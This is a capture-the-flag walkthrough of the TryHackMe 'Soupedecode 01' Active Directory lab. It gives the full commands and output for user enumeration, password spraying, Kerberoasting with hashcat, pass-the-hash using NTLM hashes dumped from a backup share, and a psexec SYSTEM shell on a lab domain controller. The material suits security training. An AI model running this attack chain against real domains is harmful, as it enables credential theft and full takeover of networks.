Skip to content

TryHackMe - Soupedecode 01

Introduction

Test your AD enumeration skills.


OS: Windows

URL: Soupedecode 01

Level: Easy


A simple Active Directory room to test your enumeration skills.

Description

Soupedecode is an intense and engaging challenge in which players must compromise a domain controller by exploiting Kerberos authentication, navigating through SMB shares, performing password spraying, and utilizing Pass-the-Hash techniques. Prepare to test your skills and strategies in this multifaceted cyber security adventure.

Recon

Run a full nmap port scan to find all open ports.

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ sudo nmap --min-rate=10000 -vv $IP -p-

Not shown: 65518 filtered tcp ports (no-response)
PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 124
88/tcp    open  kerberos-sec     syn-ack ttl 124
135/tcp   open  msrpc            syn-ack ttl 124
139/tcp   open  netbios-ssn      syn-ack ttl 124
389/tcp   open  ldap             syn-ack ttl 124
445/tcp   open  microsoft-ds     syn-ack ttl 124
464/tcp   open  kpasswd5         syn-ack ttl 124
593/tcp   open  http-rpc-epmap   syn-ack ttl 124
636/tcp   open  ldapssl          syn-ack ttl 124
3268/tcp  open  globalcatLDAP    syn-ack ttl 124
3269/tcp  open  globalcatLDAPssl syn-ack ttl 124
3389/tcp  open  ms-wbt-server    syn-ack ttl 124
9389/tcp  open  adws             syn-ack ttl 124
49664/tcp open  unknown          syn-ack ttl 124
49667/tcp open  unknown          syn-ack ttl 124
49673/tcp open  unknown          syn-ack ttl 124
49707/tcp open  unknown          syn-ack ttl 124

Many ports associated with Active Directory are open, including: 88/tcp (Kerberos), 135/tcp (MSRPC), 139/tcp (NetBIOS), 389/tcp (LDAP), 445/tcp (SMB), and 3389/tcp (RDP).


Exploitation

Shell as ybob317

Since this is not an Assumed breach scenario, we will need to find some sort of initial access.

Checking if null sessions / guest authentication is allowed for LDAP / SMB.

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc ldap $IP -u '' -p ''
LDAP        10.201.69.28    389    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:None) (channel binding:No TLS cert)
LDAP        10.201.69.28    389    DC01             [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A58, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c
LDAP        10.201.69.28    389    DC01             [+] SOUPEDECODE.LOCAL\:

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc ldap $IP -u 'guest' -p ''
LDAP        10.201.69.28    389    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:None) (channel binding:No TLS cert)
LDAP        10.201.69.28    389    DC01             [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A58, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c
LDAP        10.201.69.28    389    DC01             [+] SOUPEDECODE.LOCAL\guest:


┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc smb $IP -u '' -p '' --shares
SMB         10.201.69.28    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.201.69.28    445    DC01             [-] SOUPEDECODE.LOCAL\: STATUS_ACCESS_DENIED
SMB         10.201.69.28    445    DC01             [-] Error enumerating shares: Error occurs while reading from remote(104)

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc smb $IP -u 'guest' -p '' --shares
SMB         10.201.69.28    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.201.69.28    445    DC01             [+] SOUPEDECODE.LOCAL\guest:
SMB         10.201.69.28    445    DC01             [*] Enumerated shares
SMB         10.201.69.28    445    DC01             Share           Permissions     Remark
SMB         10.201.69.28    445    DC01             -----           -----------     ------
SMB         10.201.69.28    445    DC01             ADMIN$                          Remote Admin
SMB         10.201.69.28    445    DC01             backup
SMB         10.201.69.28    445    DC01             C$                              Default share
SMB         10.201.69.28    445    DC01             IPC$            READ            Remote IPC
SMB         10.201.69.28    445    DC01             NETLOGON                        Logon server share
SMB         10.201.69.28    445    DC01             SYSVOL                          Logon server share
SMB         10.201.69.28    445    DC01             Users

Guest authentication works for SMB but we don't have permissions to read the shares. But take note of the shares backup, Users share for later.

The guest account doesn't have the privileges to directly list all the domain users, but we can rid-brute to enumerate users.

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc smb $IP -u 'guest' -p '' --rid-brute | grep -i sidtypeuser | awk '{print $6}' | cut -d\\ -f2 > userlist.txt

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ head -n 10 userlist.txt
Administrator
Guest
krbtgt
DC01$
bmark0
otara1
kleo2
eyara3
pquinn4
jharper5

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ wc -l userlist.txt
1069 userlist.txt

We have a list of 1069 users (Which also includes computer accounts).

Now that we have a user list, let's try to see if any of the accounts are vulnerable to AS-REP Roasting attack.

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ impacket-GetNPUsers SOUPEDECODE.LOCAL/ -usersfile users.txt -outputfile asrep.txt
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User DC01$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User bmark0 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User otara1 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User kleo2 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User eyara3 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User pquinn4 doesn't have UF_DONT_REQUIRE_PREAUTH set
....
[-] User monitoring_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User admin doesn't have UF_DONT_REQUIRE_PREAUTH set

But there are no hits. Let's try to see if any of the accounts have their password set as their username.

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc ldap $IP -u users.txt -p users.txt --no-bruteforce --continue-on-success
LDAP        10.201.69.28    389    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:None) (channel binding:No TLS cert)
LDAP        10.201.69.28    389    DC01             [-] SOUPEDECODE.LOCAL\Administrator:Administrator
.....
LDAP        10.201.69.28    389    DC01             [+] SOUPEDECODE.LOCAL\ybob317:ybob317

We have a hit! The user ybob317 has the password set as ybob317.

ybob317 cannot RDP but has access to the Users share which we can use to read the flag.

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc smb $IP -u ybob317 -p ybob317 --shares
SMB         10.201.34.69    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.201.34.69    445    DC01             [+] SOUPEDECODE.LOCAL\ybob317:ybob317
SMB         10.201.34.69    445    DC01             [*] Enumerated shares
SMB         10.201.34.69    445    DC01             Share           Permissions     Remark
SMB         10.201.34.69    445    DC01             -----           -----------     ------
SMB         10.201.34.69    445    DC01             ADMIN$                          Remote Admin
SMB         10.201.34.69    445    DC01             backup
SMB         10.201.34.69    445    DC01             C$                              Default share
SMB         10.201.34.69    445    DC01             IPC$            READ            Remote IPC
SMB         10.201.34.69    445    DC01             NETLOGON        READ            Logon server share
SMB         10.201.34.69    445    DC01             SYSVOL          READ            Logon server share
SMB         10.201.34.69    445    DC01             Users           READ


┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ impacket-smbclient ybob317:ybob317@$IP
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
# use Users
# ls
drw-rw-rw-          0  Thu Jul  4 18:48:22 2024 .
drw-rw-rw-          0  Wed Jun 18 18:14:47 2025 ..
drw-rw-rw-          0  Thu Jul  4 18:49:01 2024 admin
drw-rw-rw-          0  Fri Jul 25 13:45:10 2025 Administrator
drw-rw-rw-          0  Sat Jun 15 23:49:29 2024 All Users
drw-rw-rw-          0  Sat Jun 15 22:51:08 2024 Default
drw-rw-rw-          0  Sat Jun 15 23:49:29 2024 Default User
-rw-rw-rw-        174  Sat Jun 15 23:46:32 2024 desktop.ini
drw-rw-rw-          0  Sat Jun 15 13:54:32 2024 Public
drw-rw-rw-          0  Mon Jun 17 13:24:32 2024 ybob317
#
# cat ybob317/desktop/user.txt
281**REDACTED**

Shell as file_svc

Now that we have valid domain creds, we can enumerate a lot of things.

  • AS-REP Roasting (incase you missed any domain users)
  • Keberosting
  • Pillaging shares for sensitive files / files containing credentials
  • Collecting bloodhound data to see if our user has any interesting privileges
  • Dumping the entire ldap data to look for any user attributes that may contain credentials (Description, Notes, info, etc...)
  • etc...
┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc ldap $IP -u ybob317 -p ybob317 --kerberoast kerb.hash
LDAP        10.201.34.69    389    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:None) (channel binding:No TLS cert)
LDAP        10.201.34.69    389    DC01             [+] SOUPEDECODE.LOCAL\ybob317:ybob317
LDAP        10.201.34.69    389    DC01             [*] Skipping disabled account: krbtgt
LDAP        10.201.34.69    389    DC01             [*] Total of records returned 5
LDAP        10.201.34.69    389    DC01             [*] sAMAccountName: file_svc, memberOf: [], pwdLastSet: 2024-06-17 13:32:23.726085, lastLogon: <never>
LDAP        10.201.34.69    389    DC01             $krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL\file_svc*$[...SNIP...]
LDAP        10.201.34.69    389    DC01             [*] sAMAccountName: firewall_svc, memberOf: [], pwdLastSet: 2024-06-17 13:28:32.710125, lastLogon: <never>
LDAP        10.201.34.69    389    DC01             $krb5tgs$23$*firewall_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL\firewall_svc*$[...SNIP...]
LDAP        10.201.34.69    389    DC01             [*] sAMAccountName: backup_svc, memberOf: [], pwdLastSet: 2024-06-17 13:28:49.476511, lastLogon: <never>
LDAP        10.201.34.69    389    DC01             $krb5tgs$23$*backup_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL\backup_svc*$[...SNIP...]
LDAP        10.201.34.69    389    DC01             [*] sAMAccountName: web_svc, memberOf: [], pwdLastSet: 2024-06-17 13:29:04.569417, lastLogon: <never>
LDAP        10.201.34.69    389    DC01             $krb5tgs$23$*web_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL\web_svc*$[...SNIP...]
LDAP        10.201.34.69    389    DC01             [*] sAMAccountName: monitoring_svc, memberOf: [], pwdLastSet: 2024-06-17 13:29:18.511871, lastLogon: <never>
LDAP        10.201.34.69    389    DC01             $krb5tgs$23$*monitoring_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL\monitoring_svc*$[...SNIP...]

We have a few service accounts that are vulnerable to Kerberoasting. Let's crack them.

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ hashcat kerb.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode

....

$krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL\file_svc*$[...SNIP...]:Pass**REDACTED**
Approaching final keyspace - workload adjusted.


Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: kerb.hash
Time.Started.....: Fri Aug  1 16:58:45 2025 (30 secs)
Time.Estimated...: Fri Aug  1 16:59:15 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  4692.0 kH/s (0.95ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 2/10 (20.00%) Digests (total), 2/10 (20.00%) Digests (new), 2/10 (20.00%) Salts
Progress.........: 143443850/143443850 (100.00%)
Rejected.........: 0/143443850 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:9 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[206b72697374656e616e6e65] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 34%

Started: Fri Aug  1 16:58:42 2025
Stopped: Fri Aug  1 16:59:17 2025

Shell as System

We got the creds for file_svc user, so we restart our enumeration process again checking for any new file shares that we might have access to.

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc smb $IP -u file_svc -p 'Pass**REDACTED**' --shares
SMB         10.201.34.69    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.201.34.69    445    DC01             [+] SOUPEDECODE.LOCAL\file_svc:Pass**REDACTED**
SMB         10.201.34.69    445    DC01             [*] Enumerated shares
SMB         10.201.34.69    445    DC01             Share           Permissions     Remark
SMB         10.201.34.69    445    DC01             -----           -----------     ------
SMB         10.201.34.69    445    DC01             ADMIN$                          Remote Admin
SMB         10.201.34.69    445    DC01             backup          READ
SMB         10.201.34.69    445    DC01             C$                              Default share
SMB         10.201.34.69    445    DC01             IPC$            READ            Remote IPC
SMB         10.201.34.69    445    DC01             NETLOGON        READ            Logon server share
SMB         10.201.34.69    445    DC01             SYSVOL          READ            Logon server share
SMB         10.201.34.69    445    DC01             Users

We have access to the backup share. Let's see if we can find any sensitive files.

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ impacket-smbclient file_svc:'Pass**REDACTED**'@$IP
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
# use backup
# ls
drw-rw-rw-          0  Mon Jun 17 13:41:17 2024 .
drw-rw-rw-          0  Fri Jul 25 13:51:20 2025 ..
-rw-rw-rw-        892  Mon Jun 17 13:41:23 2024 backup_extract.txt
# get backup_extract.txt
# exit

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ cat backup_extract.txt
WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::
DatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::
CitrixServer$:2122:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
FileServer$:2065:aad3b435b51404eeaad3b435b51404ee:e41d**REDACTED**:::
MailServer$:2124:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
BackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
ApplicationServer$:2126:aad3b435b51404eeaad3b435b51404ee:8cd90ac6cba6dde9d8038b068c17e9f5:::
PrintServer$:2127:aad3b435b51404eeaad3b435b51404ee:b8a38c432ac59ed00b2a373f4f050d28:::
ProxyServer$:2128:aad3b435b51404eeaad3b435b51404ee:4e3f0bb3e5b6e3e662611b1a87988881:::
MonitoringServer$:2129:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::

We get a file named backup_extract.txt which seems to contain a hashdump of machine accounts.

Let's try to see if any of the creds are actually valid.

# generate a user and hash file list so it's easier to use with nxc

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ cat backup_extract.txt | cut -d: -f1 > backup_users.txt

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ cat backup_extract.txt | cut -d: -f4 > backup_hashes.txt

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc smb $IP -u backup_users.txt -H backup_hashes.txt --no-brute
SMB         10.201.34.69    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.201.34.69    445    DC01             [-] SOUPEDECODE.LOCAL\WebServer$:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE
SMB         10.201.34.69    445    DC01             [-] SOUPEDECODE.LOCAL\DatabaseServer$:406b424c7b483a42458bf6f545c936f7 STATUS_LOGON_FAILURE
SMB         10.201.34.69    445    DC01             [-] SOUPEDECODE.LOCAL\CitrixServer$:48fc7eca9af236d7849273990f6c5117 STATUS_LOGON_FAILURE
SMB         10.201.34.69    445    DC01             [+] SOUPEDECODE.LOCAL\FileServer$:e41da**REDACTED** (Pwn3d!)

We have valid creds for FileServer$ machine account and the (Pwn3d!) indicates that we have admin access to the machine.

Let's try to get a shell on the machine as SYSTEM using impacket-psexec and read the root flag.

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ impacket-psexec 'FileServer$'@$IP -hashes :e41da7e79a**REDACTED**
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Requesting shares on 10.201.34.69.....
[*] Found writable share ADMIN$
[*] Uploading file lSJpbWWT.exe
[*] Opening SVCManager on 10.201.34.69.....
[*] Creating service RntB on 10.201.34.69.....
[*] Starting service RntB.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.587]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
**REDACTED**

It looks like the FileServer$ machine account was added to the Enterprise Admins group which allowed us to use psexec to get a shell as SYSTEM.

┌──(kali㉿kali)-[~/THM/Soupedecode01]
└─$ nxc ldap $IP -u ybob317 -p ybob317 --query '(&(objectclass=user)(sAMAccountName=FileServer$))' ""
LDAP        10.201.34.69    389    DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:None) (channel binding:No TLS cert)
LDAP        10.201.34.69    389    DC01             [+] SOUPEDECODE.LOCAL\ybob317:ybob317
LDAP        10.201.34.69    389    DC01             [+] Response for object: CN=FileServer,CN=Computers,DC=SOUPEDECODE,DC=LOCAL
LDAP        10.201.34.69    389    DC01             objectClass          top
LDAP        10.201.34.69    389    DC01                                  person
LDAP        10.201.34.69    389    DC01                                  organizationalPerson
LDAP        10.201.34.69    389    DC01                                  user
LDAP        10.201.34.69    389    DC01                                  computer
LDAP        10.201.34.69    389    DC01             cn                   FileServer
LDAP        10.201.34.69    389    DC01             distinguishedName    CN=FileServer,CN=Computers,DC=SOUPEDECODE,DC=LOCAL
LDAP        10.201.34.69    389    DC01             instanceType         4
LDAP        10.201.34.69    389    DC01             whenCreated          20240615200611.0Z
LDAP        10.201.34.69    389    DC01             whenChanged          20250801211100.0Z
LDAP        10.201.34.69    389    DC01             uSNCreated           22204
LDAP        10.201.34.69    389    DC01             memberOf             CN=Enterprise Admins,CN=Users,DC=SOUPEDECODE,DC=LOCAL